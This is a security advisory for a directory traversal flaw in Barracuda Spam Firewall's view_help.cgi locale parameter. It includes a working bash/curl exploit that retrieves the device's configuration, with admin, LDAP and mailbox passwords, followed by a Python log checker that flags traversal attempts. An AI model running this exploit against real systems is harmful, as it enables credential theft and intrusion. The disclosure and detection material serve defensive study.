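Barracuda Spam & Virus Firewall locale Variable Directory Traversal Vulnerability
Release date: 2010-10-01
Updated: 2010-10-01
Affected systems: Barracuda Networks Barracuda Spam Firewall <= 4.1.1.021
Description:
BUGTRAQ ID: 43520
Barracuda Spam Firewall is an integrated hardware and software anti-spam solution for protecting mail servers.
The Barracuda Spam Firewall implementation contains an input validation vulnerability that a remote attacker may exploit to read arbitrary files.
The cgi-mod/view_help.cgi script does not adequately check and filter the locale variable, so a remote attacker can read system files through directory traversal sequences, resulting in disclosure of sensitive information.
<*Source: ShadowHatesYou
Link:
http://secunia.com/advisories/41609/
*>
Test method:
Warning
The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!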
#!/bin/bash
# Exploit by ShadowHatesYou
# Shadow@SquatThis.net
#
# The resulting output is an SQL dump containing the Barracuda's configuration, which includes goodies such as:
#
# The administrative password for the BSF(system_password)
# MTA LDAP passwords(mta_ldap_advanced_password)
# Password for each configured mailbox(user_password)
# Internal networking information(system_gateway, system_ip, system_netmask, system_primary_dns_server, system_secondary_dns_server)
#
#
# EDB Notes:
# If /cgi-mod/view_help.cgi returns a 404, try /cgi-bin/view_help.cgi instead. You should be able to determine this manually since Barracuda automatically redirects you to the login page anyway.
if [ $# != 1 ]; then
    echo "# Barracuda Networks Spam & Virus Firewall <= 4.1.1.021 Remote Configuration Retrieval"
    echo "# Use: $0 <host/ip> "
    echo "#"
    exit;
fi;
# The URL is quoted so the shell does not treat "?" as a glob character.
curl "http://$1:8000/cgi-mod/view_help.cgi?locale=/../../../../../../../mail/snapshot/config.snapshot%00" > "$1.config"
ls -hl "$1.config"
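Recommendation:
Vendor patch:
Barracuda Networks
------------------
The vendor has not yet released a patch or upgrade. Users of this software are advised to watch the vendor's home page for the latest version:
http://www.barracudanetworks.com/ns/products/spam_overview.php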
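With no vendor fix available, requests that abuse the locale variable as described above can be looked for in web access logs. The following check is an added example, not part of the original advisory or any vendor code; the combined log format, the constructed sample lines and the pattern for legitimate locale values are assumptions.

```python
import re
from urllib.parse import urlsplit, unquote

# Assumption: legitimate locale values look like "en_US" or "de".
LOCALE_OK = re.compile(r"[A-Za-z]{2}(_[A-Za-z]{2})?")
# Request line of a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Both script locations named in the advisory.
TARGETS = ("/cgi-mod/view_help.cgi", "/cgi-bin/view_help.cgi")
# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Oct/2010:10:00:00 +0000] "GET /cgi-mod/view_help.cgi?locale=en_US HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Oct/2010:10:00:05 +0000] "GET /cgi-mod/view_help.cgi?locale=/../../../../../../../mail/snapshot/config.snapshot%00 HTTP/1.1" 200 88231',
    '198.51.100.7 - - [01/Oct/2010:10:00:09 +0000] "GET /cgi-bin/view_help.cgi?locale=%252e%252e%252fetc HTTP/1.1" 404 0',
    '192.0.2.10 - - [01/Oct/2010:10:00:12 +0000] "GET /cgi-mod/index.cgi?locale=../x HTTP/1.1" 200 100',
]

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input is caught too."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_locale(line):
    """Return the decoded locale value if the line should be flagged, else None."""
    m = REQUEST.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if fully_decode(url.path) not in TARGETS:
        return None
    # Split the raw query by hand so %00 and %2e survive until decoded here.
    for pair in url.query.split("&"):
        name, _, raw = pair.partition("=")
        value = fully_decode(raw)
        if unquote(name) == "locale" and not LOCALE_OK.fullmatch(value):
            return value
    return None

def flagged_clients(lines):
    """Return (client_ip, decoded_locale) for every flagged line."""
    hits = [(l.split(" ", 1)[0], suspicious_locale(l)) for l in lines]
    return [(ip, v) for ip, v in hits if v is not None]

if __name__ == "__main__":
    print(flagged_clients(SAMPLE_LOG))
```

The check uses an allowlist for the locale value instead of searching for "../", so encoded traversal sequences and the trailing NUL byte are flagged by the same rule.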